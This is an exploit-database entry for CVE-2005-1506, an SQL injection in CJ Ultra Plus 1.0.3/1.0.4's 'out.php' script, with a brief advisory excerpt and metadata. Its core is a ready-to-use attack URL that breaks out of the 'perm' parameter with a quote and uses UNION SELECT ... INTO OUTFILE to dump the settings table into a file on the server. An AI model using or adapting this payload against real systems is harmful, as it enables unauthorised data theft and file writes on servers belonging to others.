CJ Ultra Plus 1.0.3/1.0.4 - 'OUT.php' SQL Injection



EKU-ID: 30962 CVE: CVE-2005-1506;OSVDB-16159 OSVDB-ID:
Author: Kold Published: 2005-05-06 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


source: https://www.securityfocus.com/bid/13533/info

CJ Ultra Plus is prone to an SQL injection vulnerability.

This issue affects the 'out.php' script and could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.

/out.php?url=sad&perm=33333333333333333333333333332'%20UNION%20SELECT%20b12,b12%20FROM%20settings%20INTO%20OUTFILE%20'/path/to/ur/dir/x.txt/*